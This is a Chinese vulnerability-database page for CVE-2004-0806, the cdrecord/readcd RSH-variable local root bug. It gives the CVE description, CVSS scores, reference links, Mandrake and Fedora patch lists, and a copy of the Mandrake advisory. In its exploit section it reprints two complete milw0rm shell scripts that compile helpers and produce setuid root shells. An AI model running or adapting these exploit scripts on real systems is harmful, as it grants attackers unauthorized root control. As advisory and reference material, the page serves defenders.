CVE-2004-0806
CVSS7.2
发布时间 :2004-12-31 00:00:00
修订时间 :2013-08-07 00:32:52
NMCOEPS    

[原文]cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.


[CNNVD]CDRTools RSH环境变量权限提升漏洞(CNNVD-200412-947)

        
        CDRTools是一款基于Linux的刻录工具。
        CDRecord对RSH环境变量处理不正确,本地攻击者可以利用这个漏洞进行特权提升攻击。
        由于CDRecord执行RSH环境变量指定的应用程序时不正确的实现安全控制,攻击者可以利用环境变量获得超级用户特权。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cdrtools:cdrecord:2.0
cpe:/a:cdrtools:cdrecord:1.11

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9805cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program speci...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0806
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0806
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-947
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/700326
(VENDOR_ADVISORY)  CERT-VN  VU#700326
http://xforce.iss.net/xforce/xfdb/17303
(PATCH)  XF  cdrecord-rsh-gain-privileges(17303)
http://www.securityfocus.org/bid/11075
(PATCH)  BID  11075
https://bugzilla.fedora.us/show_bug.cgi?id=2058
(UNKNOWN)  FEDORA  FLSA:2058
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-09/0108.html
(UNKNOWN)  BUGTRAQ  20040910 CAU-EX-2004-0002: cdrecord-suidshell.sh
http://securitytracker.com/id?1011091
(UNKNOWN)  SECTRACK  1011091
http://secunia.com/advisories/12481/
(VENDOR_ADVISORY)  SECUNIA  12481
http://seclists.org/lists/bugtraq/2004/Sep/0097.html
(UNKNOWN)  BUGTRAQ  20040909 Bugtraq: cdrecord local root exploit
http://www.mandriva.com/security/advisories?name=MDKSA-2004:091
(UNKNOWN)  MANDRAKE  MDKSA-2004:091
http://secunia.com/advisories/19532
(UNKNOWN)  SECUNIA  19532
ftp://patches.sgi.com/support/free/security/advisories/20060401-01-U
(UNKNOWN)  SGI  20060401-01-U

- 漏洞信息

CDRTools RSH环境变量权限提升漏洞
高危 访问验证错误
2004-12-31 00:00:00 2005-10-20 00:00:00
本地  
        
        CDRTools是一款基于Linux的刻录工具。
        CDRecord对RSH环境变量处理不正确,本地攻击者可以利用这个漏洞进行特权提升攻击。
        由于CDRecord执行RSH环境变量指定的应用程序时不正确的实现安全控制,攻击者可以利用环境变量获得超级用户特权。
        

- 公告与补丁

        厂商补丁:
        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2004:091)以及相应补丁:
        MDKSA-2004:091:Updated cdrecord packages fix local root vulnerability
        链接:
        http://www.linux-mandrake.com/en/security/2004/2004-091.php

        补丁下载:
        Updated Packages:
        Mandrakelinux 10.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/cdrecord-2.01-0.a28.2.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/cdrecord-cdda2wav-2.01-0.a28.2.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/cdrecord-devel-2.01-0.a28.2.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/mkisofs-2.01-0.a28.2.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/SRPMS/cdrecord-2.01-0.a28.2.100mdk.src.rpm
        Mandrakelinux 10.0/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/RPMS/cdrecord-2.01-0.a28.2.100mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/RPMS/cdrecord-cdda2wav-2.01-0.a28.2.100mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/RPMS/cdrecord-devel-2.01-0.a28.2.100mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/RPMS/mkisofs-2.01-0.a28.2.100mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/10.0/SRPMS/cdrecord-2.01-0.a28.2.100mdk.src.rpm
        Mandrakelinux 9.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/cdrecord-2.01-0.a18.2.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/cdrecord-cdda2wav-2.01-0.a18.2.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/cdrecord-devel-2.01-0.a18.2.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/mkisofs-2.01-0.a18.2.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/SRPMS/cdrecord-2.01-0.a18.2.1.92mdk.src.rpm
        Mandrakelinux 9.2/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/cdrecord-2.01-0.a18.2.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/cdrecord-cdda2wav-2.01-0.a18.2.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/cdrecord-devel-2.01-0.a18.2.1.92mdk.amd64.rpm
        上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
        
        http://www.mandrakesecure.net/en/ftp.php

        RedHat
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Fedora Upgrade cdrecord-2.01-0.a19.2.FC1.1.x86_64.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdrecord-devel-2.01-0.a19.2.FC1.1.x86_64.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade mkisofs-2.01-0.a19.2.FC1.1.x86_64.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdda2wav-2.01-0.a19.2.FC1.1.x86_64.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdrtools-debuginfo-2.01-0.a19.2.FC1.1.x86_64.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdrecord-2.01-0.a19.2.FC1.1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdrecord-devel-2.01-0.a19.2.FC1.1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade mkisofs-2.01-0.a19.2.FC1.1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdda2wav-2.01-0.a19.2.FC1.1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdrtools-debuginfo-2.01-0.a19.2.FC1.1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/

        RedHat Fedora Core 1
        Fedora Upgrade cdrecord-2.01-0.a27.4.FC2.3.x86_64.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/2/

        RedHat Fedora Core 2
        Fedora Upgrade cdrecord-devel-2.01-0.a27.4.FC2.3.x86_64.rpm
        
        http://download.fedora.r

- 漏洞信息 (438)

cdrecord $RSH exec() SUID Shell Creation (EDBID:438)
linux local
2004-09-11 Verified
0 I)ruid
N/A [点击下载]
#!/bin/bash

#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord's exec() of $RSH before dropping privs 
#

cat > ./cpbinbash.c << __EOF__
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

main( int argc, char *argv[] ) {
int fd1, fd2;
int count;
char buffer[1];

/* Set ID's */
setuid( geteuid() );
setgid( geteuid() );

/* Copy the shell */
if ((fd1=open( "/bin/bash", O_RDONLY))<0)
return -1;
if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
return -1;
while((count=read(fd1, buffer, 1)))
write(fd2, buffer, count);
free(buffer);
close( fd1 );
close( fd2 );

/* Priv the shell */
chown( "./bash", geteuid(), geteuid() );
chmod( "./bash", 3565 );
}
__EOF__

cc ./cpbinbash.c -o ./cpbinbash

# Set up environment
export RSHSAVE=$RSH
export RSH=./cpbinbash

# Sploit
cdrecord dev= REMOTE:CAU:1,0,0 -

# Cleanup
rm cpbinbash*
export RSH=$RSHSAVE
export RSHSAVE=

# Use our suid bash
./bash -p 

// milw0rm.com [2004-09-11]
		

- 漏洞信息 (469)

CDRecord's ReadCD Local Root Privileges (EDBID:469)
linux local
2004-09-19 Verified
0 Max Vozeler
N/A [点击下载]
#!/bin/bash

echo "readcd-exp.sh -- ReadCD local exploit ( Test on cdrecord-2.01-0.a27.2mdk)"
echo "Author : newbug [at] chroot.org"
echo "Date :09.13.2004"
echo "IRC : irc.chroot.org #discuss"

export READCD=/usr/bin/readcd
cd /tmp

cat > s.c <<_EOF_
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>

int main()
{
setuid(0);setgid(0);
chown("/tmp/ss", 0, 0);
chmod("/tmp/ss", 04755);

return 0;
}

_EOF_

cat > ss.c <<_EOF_
#include <stdio.h>

int main()
{
setuid(0);setgid(0);
execl("/bin/bash","bash",(char *)0);

return 0;
}
_EOF_

gcc -o s s.c
gcc -o ss ss.c

export RSH=/tmp/s
$READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1
/tmp/ss


// milw0rm.com [2004-09-19]
		

- 漏洞信息 (F34328)

readcd_exp.sh (PacketStormID:F34328)
2004-09-13 00:00:00
newbug  chroot.org
exploit,local,root
linux
CVE-2004-0806
[点击下载]

Local root exploit for readcd that comes setuid default on some Linux distributions.

- 漏洞信息 (F34304)

cdr_exp.sh (PacketStormID:F34304)
2004-09-10 00:00:00
newbug  
exploit,local,root
CVE-2004-0806
[点击下载]

Local root exploit for cdrecord, which fails to drop euid=0 when it exec()s a program specified by the user through the RSH environment variable.

- 漏洞信息 (F34303)

MDKSA-2004:091.txt (PacketStormID:F34303)
2004-09-10 00:00:00
Max Vozeler  mandrakesoft.com
advisory,local,root
linux,mandrake
CVE-2004-0806
[点击下载]

Mandrake Linux Security Update Advisory - The cdrecord program, which is suid root, fails to drop euid=0 when it exec()s a program specified by the user through the RSH environment variable. This can be abused by a local attacker to obtain root privileges.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8" />
<title>MDKSA-2004:091.txt ≈ Packet Storm</title>
<meta name="description" content="Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers" />
<meta name="keywords" content="security,exploit,advisory,whitepaper,xss,csrf,overflow,scanner,vulnerability" />
<link rel="shortcut icon" href="/img/pss.ico" />
<link rel="stylesheet" media="screen,print,handheld" href="http://packetstatic.com/css1366870159/pss.css" type="text/css" />
<!--[if lt ie 8]><link rel="stylesheet" type="text/css" href="http://packetstatic.com/css1366870159/ie.css" /><![endif]-->
<script type="text/javascript" src="http://packetstatic.com/js1366870155/pt.js"></script>
<script type="text/javascript" src="http://packetstatic.com/js1366870155/pss.js"></script>
<link rel="search" type="application/opensearchdescription+xml" href="http://packetstormsecurity.com/opensearch.xml" title="Packet Storm Site Search" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Headlines" href="http://rss.packetstormsecurity.com/news/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Recent Files" href="http://rss.packetstormsecurity.com/files/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Exploits" href="http://rss.packetstormsecurity.com/files/tags/exploit/" />
<link rel="alternate" type="application/rss+xml" title="Packet Storm Advisories" href="http://rss.packetstormsecurity.com/files/tags/advisory/" />
</head>
<body id="files">
<div id="t">
   <div id="tc">
      <a id="top" href="/"><img src="http://packetstatic.com/img1353978071/ps_logo.png" width="315" height="65" id="logo" alt="packet storm" /></a>
      <div id="slogan">the original cloud security
</div>
      <div id="account"><a href="https://packetstormsecurity.com/account/register/">Register</a> | <a href="https://packetstormsecurity.com/account/login/">Login</a></div>
      <div id="search">
        <form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search …" /><button type="submit"></button><div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files" /><input type="radio" value="news" name="s" id="s-news" /><input type="radio" value="users" name="s" id="s-users" /><input type="radio" value="authors" name="s" id="s-authors" /></div></form>
      </div>
   </div>
    <div id="tn"><div id="tnc">
        <a href="/" id="tn-home"><span>Home</span></a> <a href="/files/" id="tn-files"><span>Files</span></a> <a href="/news/" id="tn-news"><span>News</span></a> <a href="/about/" id="tn-about"><span>About</span></a> <a href="/contact/" id="tn-contact"><span>Contact</span></a> <a href="/submit/" id="tn-submit"><span>Add New</span></a>
    </div></div>
    <div id="tn2"></div>
</div>

<div id="c">

 <div id="cc">
     <div id="m">
    

    
    
    
     
    <div class="h1"><h1>MDKSA-2004:091.txt</h1></div>
<dl id="F34303" class="file first">
<dt><a class="ico text-plain" href="/files/download/34303/MDKSA-2004%3A091.txt" title="Size: 3.8 KB"><strong>MDKSA-2004:091.txt</strong></a></dt>
<dd class="datetime">Posted <a href="/files/date/2004-09-10/" title="05:00:15 UTC">Sep 10, 2004</a></dd>
<dd class="refer">Authored by <a href="/files/author/3390/" class="person">Max Vozeler</a> | Site <a href="http://www.mandrakesoft.com/security/advisories">mandrakesoft.com</a></dd>
<dd class="detail"><p>Mandrake Linux Security Update Advisory - The cdrecord program, which is suid root, fails to drop euid=0 when it exec()s a program specified by the user through the RSH environment variable. This can be abused by a local attacker to obtain root privileges.</p></dd>
<dd class="tags"><span>tags</span> | <a href="/files/tags/advisory">advisory</a>, <a href="/files/tags/local">local</a>, <a href="/files/tags/root">root</a></dd>
<dd class="os"><span>systems</span> | <a href="/files/os/linux">linux</a>, <a href="/files/os/mandrake">mandrake</a></dd>
<dd class="cve"><span>advisories</span> | <a href="/files/cve/CVE-2004-0806">CVE-2004-0806</a></dd>
<dd class="md5"><span>MD5</span> | <code>a0c2b7599e8ed69de4ad012b8376523a</code></dd>
<dd class="act-links"><a href="/files/download/34303/MDKSA-2004%3A091.txt" title="Size: 3.8 KB" rel="nofollow">Download</a> | <a href="/files/favorite/34303/" class="fav" rel="nofollow">Favorite</a> | <a href="/files/34303/MDKSA-2004-091.txt.html">Comments <span>(0)</span></a></dd>
</dl>
<div id="extra-links"><a href="/files/related/34303/MDKSA-2004-091.txt.html" id="related">Related Files</a><div id="share">
<h2>Share This</h2>
<ul>
<li><iframe scrolling="no" frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 80px; height: 21px;" src="http://www.facebook.com/plugins/like.php?href=http://packetstormsecurity.com/files/34303/MDKSA-2004-091.txt.html&layout=button_count&show_faces=true&width=250&action=like&font&colorscheme=light&height=21"></iframe></li><li><iframe scrolling="no" frameborder="0" tabindex="0" allowtransparency="true" src="http://platform0.twitter.com/widgets/tweet_button.html?_=1286138321418&count=horizontal&lang=en&text=MDKSA-2004:091.txt&url=http://packetstormsecurity.com/files/34303/MDKSA-2004-091.txt.html&via=packet_storm" style="width: 110px; height: 20px;" title="Twitter"></iframe></li><li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http://packetstormsecurity.com/files/34303/MDKSA-2004-091.txt.html&title=MDKSA-2004:091.txt&source=Packet+Storm" class="LinkedIn">LinkedIn</a></li><li><a href="http://www.reddit.com/submit?url=http://packetstormsecurity.com/files/34303/MDKSA-2004-091.txt.html&title=MDKSA-2004:091.txt" class="Reddit">Reddit</a></li><li><a href="http://digg.com/submit?phase=2&url=http://packetstormsecurity.com/files/34303/MDKSA-2004-091.txt.html" class="Digg">Digg</a></li><li><a href="http://www.stumbleupon.com/submit?url=http://packetstormsecurity.com/files/34303/MDKSA-2004-091.txt.html&title=MDKSA-2004:091.txt" class="StumbleUpon">StumbleUpon</a></li></ul>
</div>
</div>
<div class="h1"><h1>MDKSA-2004:091.txt</h1></div>
<div class="src">
<div><a href="/mirrors/">Change Mirror</a> <a href="/files/download/34303/MDKSA-2004%3A091.txt">Download</a></div>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA1<br /><br /> _______________________________________________________________________<br /><br />                 Mandrakelinux Security Update Advisory<br /> _______________________________________________________________________<br /><br /> Package name:           cdrecord<br /> Advisory ID:            MDKSA-2004:091<br /> Date:                   September 7th, 2004<br /><br /> Affected versions:   10.0, 9.2<br /> ______________________________________________________________________<br /><br /> Problem Description:<br /><br /> Max Vozeler found that the cdrecord program, which is suid root, fails<br /> to drop euid=0 when it exec()s a program specified by the user through<br /> the $RSH environment variable.  This can be abused by a local attacker<br /> to obtain root privileges.<br /> <br /> The updated packages are patched to fix the vulnerability.<br /> _______________________________________________________________________<br /><br /> References:<br /><br />  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0806<br /> ______________________________________________________________________<br /><br /> Updated Packages:<br />  <br /> Mandrakelinux 10.0:<br /> 4b5efe36a9a154b70e62da203c21fb48  10.0/RPMS/cdrecord-2.01-0.a28.2.100mdk.i586.rpm<br /> 793909d6cce70205939fdb0b48f037e5  10.0/RPMS/cdrecord-cdda2wav-2.01-0.a28.2.100mdk.i586.rpm<br /> 7dd067450567cf5d9a18233fe2379a5d  10.0/RPMS/cdrecord-devel-2.01-0.a28.2.100mdk.i586.rpm<br /> 1bd94d54eed67497a8427f91239538e5  10.0/RPMS/mkisofs-2.01-0.a28.2.100mdk.i586.rpm<br /> 6afbd923794d2af44ef2e248e361382b  10.0/SRPMS/cdrecord-2.01-0.a28.2.100mdk.src.rpm<br /><br /> Mandrakelinux 10.0/AMD64:<br /> df08036127fd28e366fa6669ed59f88b  amd64/10.0/RPMS/cdrecord-2.01-0.a28.2.100mdk.amd64.rpm<br /> f0b5a254593697ef0ac13f7574cf536f  amd64/10.0/RPMS/cdrecord-cdda2wav-2.01-0.a28.2.100mdk.amd64.rpm<br /> ec1c76a1b4977e4f6e45dd097f7a45ef  amd64/10.0/RPMS/cdrecord-devel-2.01-0.a28.2.100mdk.amd64.rpm<br /> 4ec3142c182f957a6d344b375d626320  amd64/10.0/RPMS/mkisofs-2.01-0.a28.2.100mdk.amd64.rpm<br /> 6afbd923794d2af44ef2e248e361382b  amd64/10.0/SRPMS/cdrecord-2.01-0.a28.2.100mdk.src.rpm<br /><br /> Mandrakelinux 9.2:<br /> e891b428d8a011447eb6462dca30514e  9.2/RPMS/cdrecord-2.01-0.a18.2.1.92mdk.i586.rpm<br /> 9778aa9258911700bffe590be69e3782  9.2/RPMS/cdrecord-cdda2wav-2.01-0.a18.2.1.92mdk.i586.rpm<br /> 2cdd7b8f33dd7f7ce0c08aa682498891  9.2/RPMS/cdrecord-devel-2.01-0.a18.2.1.92mdk.i586.rpm<br /> 78b0c2cb0b529a54eb4607f4305809d1  9.2/RPMS/mkisofs-2.01-0.a18.2.1.92mdk.i586.rpm<br /> 3ede5ae3288520fc3a51c63cd05cc3db  9.2/SRPMS/cdrecord-2.01-0.a18.2.1.92mdk.src.rpm<br /><br /> Mandrakelinux 9.2/AMD64:<br /> c5306547c4f1221f3fd787d2b09dfa32  amd64/9.2/RPMS/cdrecord-2.01-0.a18.2.1.92mdk.amd64.rpm<br /> 5abf5f3fad0ec3d05f923c88c2255827  amd64/9.2/RPMS/cdrecord-cdda2wav-2.01-0.a18.2.1.92mdk.amd64.rpm<br /> b23bc43f135cc19254c81cf96e793780  amd64/9.2/RPMS/cdrecord-devel-2.01-0.a18.2.1.92mdk.amd64.rpm<br /> 86e60c70ee807846ace4b7e2a7e5db7a  amd64/9.2/RPMS/mkisofs-2.01-0.a18.2.1.92mdk.amd64.rpm<br /> 3ede5ae3288520fc3a51c63cd05cc3db  amd64/9.2/SRPMS/cdrecord-2.01-0.a18.2.1.92mdk.src.rpm<br /> _______________________________________________________________________<br /><br /> To upgrade automatically use MandrakeUpdate or urpmi.  The verification<br /> of md5 checksums and GPG signatures is performed automatically for you.<br /><br /> All packages are signed by Mandrakesoft for security.  You can obtain<br /> the GPG public key of the Mandrakelinux Security Team by executing:<br /><br />  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98<br /><br /> You can view other update advisories for Mandrakelinux at:<br /><br />  http://www.mandrakesoft.com/security/advisories<br /><br /> If you want to report vulnerabilities, please contact<br /><br />  security_linux-mandrake.com<br /><br /> Type Bits/KeyID     Date       User ID<br /> pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team<br />  <security linux-mandrake.com><br />-----BEGIN PGP SIGNATURE-----<br />Version: GnuPG v1.0.7 (GNU/Linux)<br /><br />iD8DBQFBPmRHmqjQ0CJFipgRAuR8AJ48LsbY9mkOay+E64emQRBKPD3tjwCgxrHt<br />LxC0Bd6qNXxIZMQEUbUTciA=<br />=SkBU<br />-----END PGP SIGNATURE-----<br /></code></pre>
</div>
<div id="comments">
<h2>Comments</h2><a href="http://rss.packetstormsecurity.com/files/34303" class="rss-cmt"><img src="http://packetstatic.com/img1353978071/bt_rss.gif" width="16" height="16" alt="RSS Feed" /> <span>Subscribe to this comment feed</span></a><br /><p id="comment-none">No comments yet, be the first!</p></div>
<div id="comment-form" style="display:none"></div><div id="comment-login"><a href="https://packetstormsecurity.com/account/login/">Login</a> or <a href="https://packetstormsecurity.com/account/register/">Register</a> to post a comment</div>
    
    
     </div>
    
      <div id="adblock">
        
      </div>
      <div id="mn">
        <div class="mn-like-us">
<ul>
<li><a href="https://twitter.com/packet_storm"><img src="http://packetstatic.com/img1353978071/s_twitter.png" width="24" height="24" alt="Follow on Twitter" /> Follow us on Twitter</a></li>
<li><a href="https://www.facebook.com/packetstormfeed"><img src="http://packetstatic.com/img1353978071/s_facebook.png" width="24" height="24" alt="Follow on Facebook" /> Follow us on Facebook</a></li>
<li><a href="/feeds"><img src="http://packetstatic.com/img1353978071/s_rss.png" width="24" height="24" alt="View RSS Feeds" /> Subscribe to an RSS Feed</a></li>
</ul>
</div>
<div class="mn-like-us"><ul><li style="border-color: #afa; background: #efe"><a style="border-color: #6f6; background: #afa; color: #060; padding-left: 0;" href="/bugbounty/"><span style="color:#393">$ $ $</span>  Write Exploits? Get Paid!</a></li></ul></div>
<div>
<form id="cal" action="/files/cal/" method="post">
<h2>File Archive:</h2><h3>April 2013</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2013-4"><span><</span></button><ul class="dotw"><li>Su</li><li>Mo</li><li>Tu</li><li>We</li><li>Th</li><li>Fr</li><li>Sa</li></ul>
<ul><li></li><li class="low"><a href="/files/date/2013-04-01/">1</a><div class="stats"><div class="point"></div><div class="date">Apr 1st</div><div class="count">10 Files</div></div></li><li class="med"><a href="/files/date/2013-04-02/">2</a><div class="stats"><div class="point"></div><div class="date">Apr 2nd</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-03/">3</a><div class="stats"><div class="point"></div><div class="date">Apr 3rd</div><div class="count">16 Files</div></div></li><li class="med"><a href="/files/date/2013-04-04/">4</a><div class="stats"><div class="point"></div><div class="date">Apr 4th</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-05/">5</a><div class="stats"><div class="point"></div><div class="date">Apr 5th</div><div class="count">30 Files</div></div></li><li class="low"><a href="/files/date/2013-04-06/">6</a><div class="stats"><div class="point"></div><div class="date">Apr 6th</div><div class="count">4 Files</div></div></li></ul>
<ul><li class="low"><a href="/files/date/2013-04-07/">7</a><div class="stats"><div class="point"></div><div class="date">Apr 7th</div><div class="count">12 Files</div></div></li><li class="med"><a href="/files/date/2013-04-08/">8</a><div class="stats"><div class="point"></div><div class="date">Apr 8th</div><div class="count">23 Files</div></div></li><li class="med"><a href="/files/date/2013-04-09/">9</a><div class="stats"><div class="point"></div><div class="date">Apr 9th</div><div class="count">26 Files</div></div></li><li class="med"><a href="/files/date/2013-04-10/">10</a><div class="stats"><div class="point"></div><div class="date">Apr 10th</div><div class="count">30 Files</div></div></li><li class="high"><a href="/files/date/2013-04-11/">11</a><div class="stats"><div class="point"></div><div class="date">Apr 11th</div><div class="count">63 Files</div></div></li><li class="low"><a href="/files/date/2013-04-12/">12</a><div class="stats"><div class="point"></div><div class="date">Apr 12th</div><div class="count">12 Files</div></div></li><li class="low"><a href="/files/date/2013-04-13/">13</a><div class="stats"><div class="point"></div><div class="date">Apr 13th</div><div class="count">3 Files</div></div></li></ul>
<ul><li class="low"><a href="/files/date/2013-04-14/">14</a><div class="stats"><div class="point"></div><div class="date">Apr 14th</div><div class="count">2 Files</div></div></li><li class="low"><a href="/files/date/2013-04-15/">15</a><div class="stats"><div class="point"></div><div class="date">Apr 15th</div><div class="count">11 Files</div></div></li><li class="med"><a href="/files/date/2013-04-16/">16</a><div class="stats"><div class="point"></div><div class="date">Apr 16th</div><div class="count">16 Files</div></div></li><li class="med"><a href="/files/date/2013-04-17/">17</a><div class="stats"><div class="point"></div><div class="date">Apr 17th</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-18/">18</a><div class="stats"><div class="point"></div><div class="date">Apr 18th</div><div class="count">15 Files</div></div></li><li class="med"><a href="/files/date/2013-04-19/">19</a><div class="stats"><div class="point"></div><div class="date">Apr 19th</div><div class="count">19 Files</div></div></li><li class="low"><a href="/files/date/2013-04-20/">20</a><div class="stats"><div class="point"></div><div class="date">Apr 20th</div><div class="count">3 Files</div></div></li></ul>
<ul><li class="low"><a href="/files/date/2013-04-21/">21</a><div class="stats"><div class="point"></div><div class="date">Apr 21st</div><div class="count">3 Files</div></div></li><li class="low"><a href="/files/date/2013-04-22/">22</a><div class="stats"><div class="point"></div><div class="date">Apr 22nd</div><div class="count">12 Files</div></div></li><li class="low"><a href="/files/date/2013-04-23/">23</a><div class="stats"><div class="point"></div><div class="date">Apr 23rd</div><div class="count">13 Files</div></div></li><li class="low"><a href="/files/date/2013-04-24/">24</a><div class="stats"><div class="point"></div><div class="date">Apr 24th</div><div class="count">11 Files</div></div></li><li class="none today"><a href="/files/date/2013-04-25/">25</a><div class="stats"><div class="point"></div><div class="date">Apr 25th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-26/">26</a><div class="stats"><div class="point"></div><div class="date">Apr 26th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-27/">27</a><div class="stats"><div class="point"></div><div class="date">Apr 27th</div><div class="count">0 Files</div></div></li></ul>
<ul><li class="none"><a href="/files/date/2013-04-28/">28</a><div class="stats"><div class="point"></div><div class="date">Apr 28th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-29/">29</a><div class="stats"><div class="point"></div><div class="date">Apr 29th</div><div class="count">0 Files</div></div></li><li class="none"><a href="/files/date/2013-04-30/">30</a><div class="stats"><div class="point"></div><div class="date">Apr 30th</div><div class="count">0 Files</div></div></li><li></li><li></li><li></li><li></li></ul>
</form></div>
<div id="mn-top-author" class="top-ten">
<h2>Top Authors In Last 30 Days</h2>
<ul>
<li><a href="/files/authors/3786">Mandriva</a> <span>126 files</span></li>
<li><a href="/files/authors/4676">Red Hat</a> <span>44 files</span></li>
<li><a href="/files/authors/3695">Ubuntu</a> <span>28 files</span></li>
<li><a href="/files/authors/2985">Cisco Systems</a> <span>17 files</span></li>
<li><a href="/files/authors/2821">Debian</a> <span>11 files</span></li>
<li><a href="/files/authors/4612">HP</a> <span>11 files</span></li>
<li><a href="/files/authors/8993">juan vazquez</a> <span>9 files</span></li>
<li><a href="/files/authors/8123">Michael Messner</a> <span>7 files</span></li>
<li><a href="/files/authors/8035">High-Tech Bridge SA</a> <span>7 files</span></li>
<li><a href="/files/authors/8982">Slackware Security Team</a> <span>7 files</span></li>
</ul>
</div>
